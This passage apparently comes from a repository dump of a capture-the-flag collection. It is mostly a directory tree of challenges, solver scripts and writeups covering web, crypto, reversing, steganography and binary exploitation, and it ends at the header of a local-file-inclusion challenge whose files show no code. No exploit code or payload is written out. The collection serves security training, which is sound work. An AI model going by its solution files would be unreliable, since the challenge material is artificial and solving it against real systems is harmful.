│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── models.py
│ │ │ │ │ ├── models.pyc
│ │ │ │ │ ├── views.py
│ │ │ │ │ └── views.pyc
│ │ │ │ │ ├── challenge_prime_sum_30pt
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── models.py
│ │ │ │ │ ├── models.pyc
│ │ │ │ │ ├── views.py
│ │ │ │ │ └── views.pyc
│ │ │ │ │ ├── challenge_simple_post_20pt
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── models.py
│ │ │ │ │ ├── models.pyc
│ │ │ │ │ ├── views.py
│ │ │ │ │ └── views.pyc
│ │ │ │ │ ├── db.sqlite3
│ │ │ │ │ ├── manage.py
│ │ │ │ │ ├── project
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── settings.py
│ │ │ │ │ ├── settings.pyc
│ │ │ │ │ ├── urls.py
│ │ │ │ │ ├── urls.pyc
│ │ │ │ │ ├── wsgi.py
│ │ │ │ │ └── wsgi.pyc
│ │ │ │ │ └── templates
│ │ │ │ │ ├── challenges
│ │ │ │ │ ├── challenge_easy_math.html
│ │ │ │ │ ├── challenge_prime_sum.html
│ │ │ │ │ └── challenge_simple_post.html
│ │ │ │ │ ├── index.html
│ │ │ │ │ ├── login.html
│ │ │ │ │ └── register.html
│ │ │ ├── Reverse
│ │ │ │ ├── 30pt- decompile me
│ │ │ │ │ ├── Sources
│ │ │ │ │ │ └── DecompileIt.jar
│ │ │ │ │ └── docompile me
│ │ │ │ │ │ ├── DecompileIt.jar
│ │ │ │ │ │ └── info.json
│ │ │ │ └── 30pt- useless
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── useless
│ │ │ │ │ ├── binary
│ │ │ │ │ └── info.json
│ │ │ ├── Steg
│ │ │ │ ├── 40pt- funny messaging
│ │ │ │ │ ├── create.py
│ │ │ │ │ ├── funny messaging
│ │ │ │ │ │ ├── info.json
│ │ │ │ │ │ └── secret.dat
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── secret.dat
│ │ │ │ └── 50pt- hidden secret
│ │ │ │ │ ├── Resources
│ │ │ │ │ ├── pass.txt
│ │ │ │ │ ├── sample.jpg
│ │ │ │ │ ├── sample.wav
│ │ │ │ │ └── secret.txt
│ │ │ │ │ ├── hidden secret
│ │ │ │ │ ├── file
│ │ │ │ │ └── info.json
│ │ │ │ │ └── info.txt
│ │ │ └── Web
│ │ │ │ ├── 20pt- do you know how to debug
│ │ │ │ ├── do you know how to debug
│ │ │ │ │ └── info.json
│ │ │ │ ├── flag.txt
│ │ │ │ ├── info.txt
│ │ │ │ └── project
│ │ │ │ │ ├── .idea
│ │ │ │ │ ├── dataSources.ids
│ │ │ │ │ ├── dataSources.local.xml
│ │ │ │ │ ├── dataSources.xml
│ │ │ │ │ ├── encodings.xml
│ │ │ │ │ ├── misc.xml
│ │ │ │ │ ├── modules.xml
│ │ │ │ │ ├── project.iml
│ │ │ │ │ ├── scopes
│ │ │ │ │ │ └── scope_settings.xml
│ │ │ │ │ ├── vcs.xml
│ │ │ │ │ └── workspace.xml
│ │ │ │ │ ├── app
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── admin.py
│ │ │ │ │ ├── admin.pyc
│ │ │ │ │ ├── models.py
│ │ │ │ │ ├── models.pyc
│ │ │ │ │ ├── tests.py
│ │ │ │ │ ├── views.py
│ │ │ │ │ └── views.pyc
│ │ │ │ │ ├── db.sqlite3
│ │ │ │ │ ├── manage.py
│ │ │ │ │ ├── project
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── settings.py
│ │ │ │ │ ├── settings.pyc
│ │ │ │ │ ├── urls.py
│ │ │ │ │ ├── urls.pyc
│ │ │ │ │ ├── wsgi.py
│ │ │ │ │ └── wsgi.pyc
│ │ │ │ │ └── templates
│ │ │ │ │ └── index.html
│ │ │ │ ├── 40pt- make it collide
│ │ │ │ ├── index.php
│ │ │ │ ├── info.txt
│ │ │ │ └── make it collide
│ │ │ │ │ └── info.json
│ │ │ │ └── 40pt- modern website
│ │ │ │ ├── Sources
│ │ │ │ ├── Store.php
│ │ │ │ ├── Untitled-1.png
│ │ │ │ ├── db-creds.inc
│ │ │ │ ├── index.html
│ │ │ │ ├── result.txt
│ │ │ │ ├── setup.php
│ │ │ │ ├── sql-connect.php
│ │ │ │ └── style.css
│ │ │ │ └── modern website
│ │ │ │ └── info.json
│ │ ├── 2- Medium
│ │ │ ├── Crypto
│ │ │ │ ├── 60pt- Custom Enc
│ │ │ │ │ ├── custom enc
│ │ │ │ │ │ ├── enc.py
│ │ │ │ │ │ └── info.json
│ │ │ │ │ ├── dec.py
│ │ │ │ │ ├── enc.py
│ │ │ │ │ └── info.txt
│ │ │ │ └── 70pt- rsa2
│ │ │ │ │ ├── Solution
│ │ │ │ │ ├── factor.log
│ │ │ │ │ ├── out.pub
│ │ │ │ │ ├── session.log
│ │ │ │ │ └── solver.py
│ │ │ │ │ ├── create.md
│ │ │ │ │ ├── info.txt
│ │ │ │ │ ├── out.key
│ │ │ │ │ ├── rsa2
│ │ │ │ │ ├── info.json
│ │ │ │ │ ├── msg.enc
│ │ │ │ │ └── out.pub
│ │ │ │ │ └── solver.py
│ │ │ ├── Misc
│ │ │ │ ├── 80pt- catch me if you can
│ │ │ │ │ ├── Sources
│ │ │ │ │ │ ├── !pd.nfo
│ │ │ │ │ │ ├── Click.598-1395.10.19_p30download.com
│ │ │ │ │ │ │ ├── !pd.nfo
│ │ │ │ │ │ │ ├── pd.jpg
│ │ │ │ │ │ │ ├── www.p30download.com.url
│ │ │ │ │ │ │ └── www.p30forum.com.url
│ │ │ │ │ │ ├── flag.txt
│ │ │ │ │ │ ├── pd.jpg
│ │ │ │ │ │ ├── www.p30download.com.url
│ │ │ │ │ │ └── www.p30forum.com.url
│ │ │ │ │ ├── catch me if you can
│ │ │ │ │ │ ├── flag.zip
│ │ │ │ │ │ └── info.json
│ │ │ │ │ └── info.txt
│ │ │ │ └── 80pt- crypted png
│ │ │ │ │ └── crypted png
│ │ │ │ │ ├── encrypt.py
│ │ │ │ │ ├── flag_encrypted.png
│ │ │ │ │ └── info.json
│ │ │ ├── PPC
│ │ │ │ └── 50pt- finding the truth
│ │ │ │ │ └── finding the truth
│ │ │ │ │ ├── encoding.py
│ │ │ │ │ └── info.json
│ │ │ ├── Reverse
│ │ │ │ ├── 50pt- can you crack this
│ │ │ │ │ ├── can you crack this
│ │ │ │ │ │ ├── crackme
│ │ │ │ │ │ └── info.json
│ │ │ │ │ ├── crackme
│ │ │ │ │ ├── crackme.c
│ │ │ │ │ └── info.txt
│ │ │ │ └── 60pt- password validator
│ │ │ │ │ ├── Resources
│ │ │ │ │ ├── clear.py
│ │ │ │ │ ├── create.sh
│ │ │ │ │ ├── desc.txt
│ │ │ │ │ ├── generator.py
│ │ │ │ │ ├── rev
│ │ │ │ │ └── rev300.c
│ │ │ │ │ ├── generator.py
│ │ │ │ │ ├── info.txt
│ │ │ │ │ ├── password validator
│ │ │ │ │ ├── info.json
│ │ │ │ │ └── rev
│ │ │ │ │ ├── rev
│ │ │ │ │ └── source.c
│ │ │ ├── Steg
│ │ │ │ └── 50pt- tricky but easy
│ │ │ │ │ ├── flag.txt
│ │ │ │ │ ├── info.txt
│ │ │ │ │ ├── sample.jpg
│ │ │ │ │ └── tricky but easy
│ │ │ │ │ ├── hidden.jpg
│ │ │ │ │ └── info.json
│ │ │ └── Web
│ │ │ │ ├── 50pt- i like serials
│ │ │ │ ├── Sources
│ │ │ │ │ ├── flag.php
│ │ │ │ │ └── index.php
│ │ │ │ ├── i like serials
│ │ │ │ │ └── info.json
│ │ │ │ ├── info.txt
│ │ │ │ └── solve.php
│ │ │ │ └── 70pt- old php
│ │ │ │ ├── flag.php
│ │ │ │ ├── index.php
│ │ │ │ ├── info.txt
│ │ │ │ └── old php
│ │ │ │ └── info.json
│ │ └── 3- Harder
│ │ │ ├── Network
│ │ │ └── do the impossible
│ │ │ │ ├── Q11.json
│ │ │ │ ├── Q11_TOR_TXT.txt
│ │ │ │ ├── Q11_Web_application
│ │ │ │ ├── Q11_TOR_TXT.txt
│ │ │ │ └── Q11_Web_application
│ │ │ │ │ └── html
│ │ │ │ │ ├── css
│ │ │ │ │ ├── base.css
│ │ │ │ │ ├── demo.css
│ │ │ │ │ ├── font-awesome
│ │ │ │ │ │ ├── css
│ │ │ │ │ │ │ ├── font-awesome.css
│ │ │ │ │ │ │ └── font-awesome.min.css
│ │ │ │ │ │ └── fonts
│ │ │ │ │ │ │ ├── FontAwesome.otf
│ │ │ │ │ │ │ ├── fontawesome-webfont.eot
│ │ │ │ │ │ │ ├── fontawesome-webfont.svg
│ │ │ │ │ │ │ ├── fontawesome-webfont.ttf
│ │ │ │ │ │ │ └── fontawesome-webfont.woff
│ │ │ │ │ ├── fonts.css
│ │ │ │ │ ├── main.css
│ │ │ │ │ └── vendor.css
│ │ │ │ │ ├── favicon.png
│ │ │ │ │ ├── fonts
│ │ │ │ │ └── roboto
│ │ │ │ │ │ ├── roboto-black-webfont.eot
│ │ │ │ │ │ ├── roboto-black-webfont.svg
│ │ │ │ │ │ ├── roboto-black-webfont.ttf
│ │ │ │ │ │ ├── roboto-black-webfont.woff
│ │ │ │ │ │ ├── roboto-black-webfont.woff2
│ │ │ │ │ │ ├── roboto-blackitalic-webfont.eot
│ │ │ │ │ │ ├── roboto-blackitalic-webfont.svg
│ │ │ │ │ │ ├── roboto-blackitalic-webfont.ttf
│ │ │ │ │ │ ├── roboto-blackitalic-webfont.woff
│ │ │ │ │ │ ├── roboto-blackitalic-webfont.woff2
│ │ │ │ │ │ ├── roboto-bold-webfont.eot
│ │ │ │ │ │ ├── roboto-bold-webfont.svg
│ │ │ │ │ │ ├── roboto-bold-webfont.ttf
│ │ │ │ │ │ ├── roboto-bold-webfont.woff
│ │ │ │ │ │ ├── roboto-bold-webfont.woff2
│ │ │ │ │ │ ├── roboto-bolditalic-webfont.eot
│ │ │ │ │ │ ├── roboto-bolditalic-webfont.svg
│ │ │ │ │ │ ├── roboto-bolditalic-webfont.ttf
│ │ │ │ │ │ ├── roboto-bolditalic-webfont.woff
│ │ │ │ │ │ ├── roboto-bolditalic-webfont.woff2
│ │ │ │ │ │ ├── roboto-italic-webfont.eot
│ │ │ │ │ │ ├── roboto-italic-webfont.svg
│ │ │ │ │ │ ├── roboto-italic-webfont.ttf
│ │ │ │ │ │ ├── roboto-italic-webfont.woff
│ │ │ │ │ │ ├── roboto-italic-webfont.woff2
│ │ │ │ │ │ ├── roboto-light-webfont.eot
│ │ │ │ │ │ ├── roboto-light-webfont.svg
│ │ │ │ │ │ ├── roboto-light-webfont.ttf
│ │ │ │ │ │ ├── roboto-light-webfont.woff
│ │ │ │ │ │ ├── roboto-light-webfont.woff2
│ │ │ │ │ │ ├── roboto-lightitalic-webfont.eot
│ │ │ │ │ │ ├── roboto-lightitalic-webfont.svg
│ │ │ │ │ │ ├── roboto-lightitalic-webfont.ttf
│ │ │ │ │ │ ├── roboto-lightitalic-webfont.woff
│ │ │ │ │ │ ├── roboto-lightitalic-webfont.woff2
│ │ │ │ │ │ ├── roboto-medium-webfont.eot
│ │ │ │ │ │ ├── roboto-medium-webfont.svg
│ │ │ │ │ │ ├── roboto-medium-webfont.ttf
│ │ │ │ │ │ ├── roboto-medium-webfont.woff
│ │ │ │ │ │ ├── roboto-medium-webfont.woff2
│ │ │ │ │ │ ├── roboto-mediumitalic-webfont.eot
│ │ │ │ │ │ ├── roboto-mediumitalic-webfont.svg
│ │ │ │ │ │ ├── roboto-mediumitalic-webfont.ttf
│ │ │ │ │ │ ├── roboto-mediumitalic-webfont.woff
│ │ │ │ │ │ ├── roboto-mediumitalic-webfont.woff2
│ │ │ │ │ │ ├── roboto-regular-webfont.eot
│ │ │ │ │ │ ├── roboto-regular-webfont.svg
│ │ │ │ │ │ ├── roboto-regular-webfont.ttf
│ │ │ │ │ │ ├── roboto-regular-webfont.woff
│ │ │ │ │ │ ├── roboto-regular-webfont.woff2
│ │ │ │ │ │ ├── roboto-thin-webfont.eot
│ │ │ │ │ │ ├── roboto-thin-webfont.svg
│ │ │ │ │ │ ├── roboto-thin-webfont.ttf
│ │ │ │ │ │ ├── roboto-thin-webfont.woff
│ │ │ │ │ │ ├── roboto-thin-webfont.woff2
│ │ │ │ │ │ ├── roboto-thinitalic-webfont.eot
│ │ │ │ │ │ ├── roboto-thinitalic-webfont.svg
│ │ │ │ │ │ ├── roboto-thinitalic-webfont.ttf
│ │ │ │ │ │ ├── roboto-thinitalic-webfont.woff
│ │ │ │ │ │ ├── roboto-thinitalic-webfont.woff2
│ │ │ │ │ │ └── stylesheet.css
│ │ │ │ │ ├── images
│ │ │ │ │ ├── demo
│ │ │ │ │ │ ├── demo-particles.jpg
│ │ │ │ │ │ ├── demo-slideshow.jpg
│ │ │ │ │ │ └── demo-static.jpg
│ │ │ │ │ ├── main-logo.png
│ │ │ │ │ └── slides
│ │ │ │ │ │ ├── dandelion.jpg
│ │ │ │ │ │ ├── greens.jpg
│ │ │ │ │ │ └── woods.jpg
│ │ │ │ │ ├── index.html
│ │ │ │ │ ├── js
│ │ │ │ │ ├── jquery-2.1.3.min.js
│ │ │ │ │ ├── main.js
│ │ │ │ │ ├── modernizr.js
│ │ │ │ │ └── plugins.js
│ │ │ │ │ └── readme.txt
│ │ │ │ └── do the impossible
│ │ │ │ └── info.json
│ │ │ ├── PPC & Crypto
│ │ │ └── 90pt- hash factory
│ │ │ │ ├── hash factory
│ │ │ │ └── info.json
│ │ │ │ └── server.py
│ │ │ ├── PPC & Web
│ │ │ └── 100pt- I hate captchas
│ │ │ │ ├── Challenge
│ │ │ │ ├── captcha.php
│ │ │ │ ├── check.php
│ │ │ │ └── index.php
│ │ │ │ ├── i hate captchas
│ │ │ │ └── info.json
│ │ │ │ ├── info.txt
│ │ │ │ └── solve
│ │ │ │ ├── captcha.png
│ │ │ │ ├── out.txt
│ │ │ │ ├── output.png
│ │ │ │ ├── output2.png
│ │ │ │ └── solve.py
│ │ │ ├── Steg
│ │ │ ├── 80pt- SLSB
│ │ │ │ ├── README.md
│ │ │ │ ├── Resources
│ │ │ │ │ ├── LSBDecrypter.py
│ │ │ │ │ ├── LSBEncrypter.py
│ │ │ │ │ ├── README.md
│ │ │ │ │ ├── lsb.bmp
│ │ │ │ │ └── lsb1.bmp
│ │ │ │ ├── SLSBDecrypter.py
│ │ │ │ ├── SLSBEncrypter.py
│ │ │ │ ├── info.txt
│ │ │ │ ├── lsb.bmp
│ │ │ │ ├── lsb1.bmp
│ │ │ │ └── slsb
│ │ │ │ │ ├── file.bmp
│ │ │ │ │ └── info.json
│ │ │ └── 80pt- secret channel
│ │ │ │ ├── create.py
│ │ │ │ ├── flag.jpg
│ │ │ │ ├── for.pcapng
│ │ │ │ ├── info.txt
│ │ │ │ └── secret channel
│ │ │ │ ├── info.json
│ │ │ │ └── secret.pcapng
│ │ │ └── Web
│ │ │ └── my awesome shop
│ │ │ ├── Challenge Sources.zip
│ │ │ ├── Challenge Sources
│ │ │ ├── local-admin-server
│ │ │ │ ├── .idea
│ │ │ │ │ ├── flask.iml
│ │ │ │ │ ├── misc.xml
│ │ │ │ │ ├── modules.xml
│ │ │ │ │ └── workspace.xml
│ │ │ │ ├── app.py
│ │ │ │ └── templates
│ │ │ │ │ ├── comment.html
│ │ │ │ │ ├── comments.html
│ │ │ │ │ └── index.html
│ │ │ └── shop-server
│ │ │ │ ├── .idea
│ │ │ │ ├── .name
│ │ │ │ ├── dataSources.ids
│ │ │ │ ├── dataSources.local.xml
│ │ │ │ ├── dataSources.xml
│ │ │ │ ├── dataSources
│ │ │ │ │ └── 81ea6526-dc6b-410a-8865-bcfe154bc2f8.xml
│ │ │ │ ├── deployment.xml
│ │ │ │ ├── encodings.xml
│ │ │ │ ├── misc.xml
│ │ │ │ ├── modules.xml
│ │ │ │ ├── project.iml
│ │ │ │ ├── scopes
│ │ │ │ │ └── scope_settings.xml
│ │ │ │ ├── vcs.xml
│ │ │ │ ├── webServers.xml
│ │ │ │ └── workspace.xml
│ │ │ │ ├── app
│ │ │ │ ├── __init__.py
│ │ │ │ ├── admin.py
│ │ │ │ ├── forms.py
│ │ │ │ ├── models.py
│ │ │ │ ├── tests.py
│ │ │ │ └── views.py
│ │ │ │ ├── comments
│ │ │ │ ├── __init__.py
│ │ │ │ ├── admin.py
│ │ │ │ ├── models.py
│ │ │ │ ├── tests.py
│ │ │ │ ├── urls.py
│ │ │ │ └── views.py
│ │ │ │ ├── manage.py
│ │ │ │ ├── project
│ │ │ │ ├── __init__.py
│ │ │ │ ├── settings.py
│ │ │ │ ├── urls.py
│ │ │ │ └── wsgi.py
│ │ │ │ ├── shop
│ │ │ │ ├── __init__.py
│ │ │ │ ├── admin.py
│ │ │ │ ├── models.py
│ │ │ │ ├── tests.py
│ │ │ │ ├── urls.py
│ │ │ │ └── views.py
│ │ │ │ └── templates
│ │ │ │ ├── comments
│ │ │ │ └── view.html
│ │ │ │ ├── index.html
│ │ │ │ ├── login.html
│ │ │ │ ├── register.html
│ │ │ │ └── shop
│ │ │ │ └── index.html
│ │ │ ├── bot.py
│ │ │ ├── django-shop
│ │ │ ├── django-shop1.zip
│ │ │ ├── django-shop1
│ │ │ │ ├── info.json
│ │ │ │ └── source.zip
│ │ │ ├── django-shop2.zip
│ │ │ └── django-shop2
│ │ │ │ └── info.json
│ │ │ ├── flask-3pt
│ │ │ ├── .idea
│ │ │ │ ├── flask.iml
│ │ │ │ ├── misc.xml
│ │ │ │ ├── modules.xml
│ │ │ │ └── workspace.xml
│ │ │ ├── app.py
│ │ │ └── templates
│ │ │ │ ├── comment.html
│ │ │ │ ├── comments.html
│ │ │ │ └── index.html
│ │ │ ├── flask
│ │ │ ├── .idea
│ │ │ │ ├── flask.iml
│ │ │ │ ├── misc.xml
│ │ │ │ ├── modules.xml
│ │ │ │ └── workspace.xml
│ │ │ ├── app.py
│ │ │ └── templates
│ │ │ │ ├── comment.html
│ │ │ │ ├── comments.html
│ │ │ │ └── index.html
│ │ │ ├── ghostdriver.log
│ │ │ ├── info.txt
│ │ │ ├── project
│ │ │ ├── .idea
│ │ │ │ ├── .name
│ │ │ │ ├── dataSources.ids
│ │ │ │ ├── dataSources.local.xml
│ │ │ │ ├── dataSources.xml
│ │ │ │ ├── dataSources
│ │ │ │ │ └── 81ea6526-dc6b-410a-8865-bcfe154bc2f8.xml
│ │ │ │ ├── deployment.xml
│ │ │ │ ├── encodings.xml
│ │ │ │ ├── misc.xml
│ │ │ │ ├── modules.xml
│ │ │ │ ├── project.iml
│ │ │ │ ├── scopes
│ │ │ │ │ └── scope_settings.xml
│ │ │ │ ├── vcs.xml
│ │ │ │ ├── webServers.xml
│ │ │ │ └── workspace.xml
│ │ │ ├── app
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── admin.py
│ │ │ │ ├── admin.pyc
│ │ │ │ ├── forms.py
│ │ │ │ ├── forms.pyc
│ │ │ │ ├── migrations
│ │ │ │ │ ├── 0001_initial.py
│ │ │ │ │ ├── 0001_initial.pyc
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── __init__.pyc
│ │ │ │ ├── models.py
│ │ │ │ ├── models.pyc
│ │ │ │ ├── tests.py
│ │ │ │ ├── views.py
│ │ │ │ └── views.pyc
│ │ │ ├── comments
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── admin.py
│ │ │ │ ├── admin.pyc
│ │ │ │ ├── migrations
│ │ │ │ │ ├── 0001_initial.py
│ │ │ │ │ ├── 0001_initial.pyc
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── __init__.pyc
│ │ │ │ ├── models.py
│ │ │ │ ├── models.pyc
│ │ │ │ ├── tests.py
│ │ │ │ ├── urls.py
│ │ │ │ ├── urls.pyc
│ │ │ │ ├── views.py
│ │ │ │ └── views.pyc
│ │ │ ├── db.sqlite3
│ │ │ ├── manage.py
│ │ │ ├── project
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── settings.py
│ │ │ │ ├── settings.pyc
│ │ │ │ ├── urls.py
│ │ │ │ ├── urls.pyc
│ │ │ │ ├── wsgi.py
│ │ │ │ └── wsgi.pyc
│ │ │ ├── shop
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── admin.py
│ │ │ │ ├── admin.pyc
│ │ │ │ ├── models.py
│ │ │ │ ├── models.pyc
│ │ │ │ ├── tests.py
│ │ │ │ ├── urls.py
│ │ │ │ ├── urls.pyc
│ │ │ │ ├── views.py
│ │ │ │ └── views.pyc
│ │ │ └── templates
│ │ │ │ ├── comments
│ │ │ │ └── view.html
│ │ │ │ ├── index.html
│ │ │ │ ├── login.html
│ │ │ │ ├── register.html
│ │ │ │ └── shop
│ │ │ │ └── index.html
│ │ │ └── solution.md
│ └── README.md
└── README.md
├── LICENSE
├── Online-CTF
├── adventofcode.com Writeups
│ ├── day1
│ │ ├── 1.py
│ │ └── 2.py
│ ├── day2
│ │ ├── 1.py
│ │ └── 2.py
│ └── day4
│ │ └── 1.py
├── pwnable.kr-writeups
│ └── Toddler's Bottle
│ │ ├── bof
│ │ ├── bof
│ │ ├── bof.c
│ │ ├── readme.md
│ │ └── solve.py
│ │ └── fd
│ │ ├── fd.c
│ │ └── readme.md
├── ringzer0team.com
│ └── coding
│ │ ├── 1-hash_me_if_you_can
│ │ ├── README.md
│ │ └── solver.py
│ │ ├── 10-read_me_if_you_can
│ │ ├── README.md
│ │ ├── captcha.png
│ │ └── solver.py
│ │ ├── 11-hash_breaker_reloaded_again
│ │ ├── README.md
│ │ └── solver.py
│ │ ├── 12-ascii_art
│ │ ├── README.md
│ │ └── solver.py
│ │ ├── 3-hash_me_again
│ │ ├── README.md
│ │ └── solver.py
│ │ ├── 4-i_hate_mathematics
│ │ ├── README.md
│ │ └── solver.py
│ │ ├── 6-hash_breaker
│ │ ├── README.md
│ │ └── solver.py
│ │ └── 8-hash_breaker_reloaded
│ │ ├── README.md
│ │ └── solver.py
└── root-me
│ └── programming
│ └── 1-go_back_to_college
│ ├── README.md
│ └── solver.py
├── README.md
├── Wiki
└── README.md
└── Writeups
├── 2015
├── hack.dat.kiwi
│ ├── README.md
│ ├── gaychal
│ │ └── README.md
│ └── phonelock1
│ │ └── README.md
└── seccon
│ ├── Command-line Quiz
│ └── README.md
│ └── SecconWars
│ ├── README.md
│ └── images
│ ├── steg-1.jpg
│ └── steg-2.jpg
├── 2016
├── Plaid
│ ├── morset
│ │ ├── solver.py
│ │ └── test.py
│ ├── rabbit
│ │ ├── rabbit.py
│ │ ├── solver.py
│ │ ├── solver2.py
│ │ ├── util.py
│ │ └── util.pyc
│ └── tonnerre
│ │ └── database.dump
├── SharifCTF
│ ├── Bsniff
│ │ └── README.md
│ ├── Cryp1
│ │ ├── Ciphertext
│ │ └── README.md
│ ├── For2-dumped
│ │ └── README.md
│ ├── Web3-oldpersian
│ │ ├── README.md
│ │ ├── images
│ │ │ ├── captcha_main.jpg
│ │ │ ├── main_page.jpg
│ │ │ ├── sample_1.jpg
│ │ │ ├── sample_2.jpg
│ │ │ ├── sample_3.jpg
│ │ │ ├── sample_4.jpg
│ │ │ └── trans.png
│ │ └── solver.py
│ └── jareCaptcha
│ │ └── README.md
├── abctf
│ ├── cryptography
│ │ └── yummy
│ │ │ ├── baconian.bmp
│ │ │ └── solver.py
│ └── programming
│ │ ├── Slime Season 3
│ │ ├── solver.c
│ │ └── solver.py
│ │ ├── TGIF
│ │ ├── date.txt
│ │ └── solver.py
│ │ ├── qset
│ │ ├── __init__.py
│ │ ├── interpreter.py
│ │ ├── interpreter.pyc
│ │ └── solver.py
│ │ ├── racecar
│ │ ├── input.txt
│ │ └── solver.py
│ │ └── the big kahuna
│ │ ├── solver.cc
│ │ └── solver.py
├── pwn2win
│ ├── Tokens
│ │ └── README.md
│ └── sequences
│ │ └── README.md
├── sCTF
│ ├── Algorithmic
│ │ └── Tracking
│ │ │ ├── README.md
│ │ │ ├── description.txt
│ │ │ ├── info
│ │ │ ├── raw_data.dat
│ │ │ ├── solver.py
│ │ │ └── tracking.in
│ └── cryptography
│ │ ├── Verticode
│ │ ├── README.md
│ │ ├── code1.png
│ │ ├── description
│ │ ├── image.png
│ │ └── solver.py
│ │ └── Vertinet
│ │ ├── README.md
│ │ ├── description
│ │ ├── image.png
│ │ └── solver.py
└── tuctf
│ ├── crypt
│ ├── magic-image
│ │ ├── encrypt.py
│ │ ├── encrypted.png
│ │ ├── output.png
│ │ └── solver.py
│ └── neverending
│ │ └── solver.py
│ └── misc
│ └── the nack
│ ├── README.md
│ ├── file.pcapng
│ ├── output.gif
│ └── solver.py
├── 2018
└── BSides Delhi CTF
│ ├── Crypt100-TileMate
│ ├── README.md
│ ├── ci.pher.text
│ ├── encrypt.py
│ └── solver.py
│ └── Web200
│ └── README.md
├── 2021
├── CSAW
│ ├── Warmup
│ │ ├── Warmup.py
│ │ ├── output.txt
│ │ └── solve.py
│ ├── crack me
│ │ └── README.md
│ ├── exploit1
│ │ ├── password_checker
│ │ └── solve.py
│ └── web1
│ │ └── solve.txt
├── TMUCTF
│ └── Pwn
│ │ └── Security Code
│ │ ├── README.md
│ │ ├── flag.txt
│ │ ├── images
│ │ ├── 1.jpg
│ │ ├── 2.jpg
│ │ └── 3.jpg
│ │ ├── securitycode
│ │ └── solve.py
├── hxp
│ └── misc
│ │ └── Log 4 sanity check
│ │ ├── Dockerfile
│ │ ├── Vuln.class
│ │ ├── docker-stuff
│ │ └── readflag
│ │ ├── log4j-api-2.14.1.jar
│ │ ├── log4j-core-2.14.1.jar
│ │ ├── log4j2.xml
│ │ ├── readme.md
│ │ ├── run.sh
│ │ └── ynetd
└── seccon
│ └── average
│ ├── average
│ ├── average.c
│ ├── libc.so.6
│ └── solve.py
├── 2024
├── ASIS Quals
│ ├── Detic
│ │ ├── README.md
│ │ ├── requirements.txt
│ │ └── solve.py
│ ├── README.md
│ └── Snoopy
│ │ ├── README.md
│ │ ├── images
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ └── image4.png
│ │ ├── packets.txt
│ │ ├── snoopy.pcap
│ │ └── solve.py
├── BuckeyeCTF
│ ├── SSFS
│ │ ├── images
│ │ │ └── image1.png
│ │ ├── readme.md
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── app.py
│ │ │ ├── flag.txt
│ │ │ ├── requirements.txt
│ │ │ ├── static
│ │ │ └── css
│ │ │ │ └── style.css
│ │ │ └── templates
│ │ │ └── index.html
│ ├── color
│ │ ├── readme.md
│ │ ├── solve.py
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── Makefile
│ │ │ ├── color
│ │ │ └── color.c
│ ├── donut
│ │ ├── readme.md
│ │ └── solve.py
│ ├── gitgoo
│ │ └── readme.md
│ ├── quotes
│ │ ├── readme.md
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── README.md
│ │ │ ├── app.js
│ │ │ ├── package.json
│ │ │ ├── pnpm-lock.yaml
│ │ │ └── quotes
│ ├── readme.md
│ ├── reduce_cycle
│ │ ├── png_header.bin
│ │ └── readme.md
│ ├── rsa
│ │ ├── readme.md
│ │ ├── rsa.py
│ │ └── solve.py
│ ├── runway0
│ │ ├── readme.md
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── Makefile
│ │ │ ├── docker-compose.yaml
│ │ │ ├── flag.txt
│ │ │ ├── runway0
│ │ │ └── runway0.c
│ ├── runway1
│ │ ├── readme.md
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── Makefile
│ │ │ ├── docker-compose.yaml
│ │ │ ├── flag.txt
│ │ │ ├── runway1
│ │ │ └── runway1.c
│ ├── runway2
│ │ ├── solve.py
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── Makefile
│ │ │ ├── docker-compose.yaml
│ │ │ ├── flag.txt
│ │ │ ├── runway2
│ │ │ └── runway2.c
│ ├── runway3
│ │ ├── solve.py
│ │ └── source
│ │ │ ├── Dockerfile
│ │ │ ├── Makefile
│ │ │ ├── docker-compose.yaml
│ │ │ ├── flag.txt
│ │ │ ├── runway3
│ │ │ └── runway3.c
│ ├── the_CIA
│ │ ├── _protected-cia-document.pdf.extracted
│ │ │ ├── 1C749
│ │ │ └── 1C749.zlib
│ │ └── protected-cia-document.pdf
│ ├── wreck
│ │ ├── binwalk.txt
│ │ ├── output.jpg
│ │ └── readme.md
│ └── xnor
│ │ ├── solve.py
│ │ ├── xnor.py
│ │ └── xnor_output.txt
└── Questcon
│ ├── Web4 - WhoIAM
│ └── solve.md
│ ├── web1 - Direction
│ └── solve.md
│ ├── web2 - Theadmin
│ └── solve.md
│ └── web3 - Temp
│ └── solve.md
├── LICENSE
└── README.md
/Challenges/BinaryCodes/Web/easy-lfi1/app/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/easy-lfi1/app/favicon.ico
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/easy-lfi1/app/pages/page.php:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/easy-lfi1/app/somerandomtext/flag.php:
